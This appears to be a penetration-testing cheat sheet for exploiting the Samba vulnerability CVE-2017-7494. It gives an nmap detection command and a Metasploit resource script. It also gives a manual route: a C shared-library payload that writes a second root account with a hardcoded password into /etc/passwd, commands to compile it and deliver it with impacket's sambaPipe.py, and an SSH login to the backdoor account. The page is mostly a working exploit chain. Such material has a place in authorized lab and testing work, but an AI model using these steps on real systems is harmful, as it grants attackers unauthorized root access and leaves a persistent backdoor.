Manuel exploits on exploit-db (without Metasploit) or on github do not seem to work.
Detection
IP=x.x.x.x
nmap -Pn --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 $IPExploit using Metasploit
When it works, a session is opened. See Metasploit.
msf-smb-exploit.rc
use exploit/linux/samba/is_known_pipename
set RHOSTS x.x.x.x
set SMB_SHARE_NAME MyShare
set SMB_FOLDER /
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1
set VERBOSE true
set ExitOnSession false
exploit -jRun the exploit
sudo msfconsole -q -r msf-smb-exploit.rcExploit manually
payload.c
This payload will add a second root user.
#include <stdio.h>
#include <stdlib.h>
static void smash() __attribute__((constructor));
void smash() {
setresuid(0,0,0);
system("echo root2:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd");
}Compile the payload (generates a .so)
gcc -o payload.so -shared payload.c -fPICRun the exploit
This script will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through the -so parameter.
IP=x.x.x.x
/usr/share/doc/python3-impacket/examples/sambaPipe.py -so payload.so -no-pass -port 445 $IPConnect to the victim using SSH
ssh root2@x.x.x.x
[PreciouS]